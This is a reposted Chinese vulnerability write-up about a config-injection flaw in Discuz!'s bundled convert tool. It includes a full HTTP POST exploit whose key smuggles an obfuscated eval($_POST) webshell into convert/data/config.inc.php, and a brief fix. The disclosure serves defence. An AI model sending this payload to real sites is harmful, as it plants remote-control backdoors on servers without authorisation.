网站地图    收藏   

主页 > 后端 > 网站安全 >

discuz!某自带工具,由于使用不当,可以造成web

来源:自学PHP网    时间:2015-04-16 23:15 作者: 阅读:

[导读] discuz!某自带工具,由于使用不当,可以造成webshell。而且经过调查,使用者数量较大。discuz! 安装包中会自带一个转换工具 convert这个工具由于存在安全问题,可以拿shell一般存在网站目...

discuz!某自带工具,由于使用不当,可以造成webshell。
而且经过调查,使用者数量较大。
 
discuz! 安装包中会自带一个转换工具 convert
 
这个工具由于存在安全问题,可以拿shell
 
一般存在网站目录 convert 或 utility/convert
 
而且经过调查,使用数量还是很大的。
 
 
 
使用前题是data目录可写,这也是这个工具的使用前题。
 
分析:
 
文件:
 
utility\convert\include\do_config.inc.php
 
 
保存配置,跟踪到save_config_file
 
utility\convert\include\global.func.php
 
 
 
分析方法:getvars 和 buildarray等
 
 
 
可以看出,对key进行过滤只有
 
getvars 前面,但后面的key完全没有过滤。
 
在 GPC OFF 时可直接拿shell
 
ON 时,
 
if($level == 0) {

$newline = str_pad(' CONFIG '.strtoupper($key).' ', 50, '-', STR_PAD_BOTH);

$return .= "\r\n// $newline //\r\n";

}

 

 
 
 
首字母也写到文件中。我们只要把key 加上换行符,就能实现写shell
 
 
 
 
 
通过方法:
 
 
 
 
 
POST /utility/convert/index.php?a=config&source=d7.2_x2.0 HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: keep-alive

Content-Length: 199

Content-Type: application/x-www-form-urlencoded



newconfig[aaa%0a%0deval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR

(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR

(59));//]=aaaa&submit=yes



 

 
 
即可以写shell,shell地址
 
 
 
convert/data/config.inc.php
 
修复方案:
修改这个程序,或用完删除

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论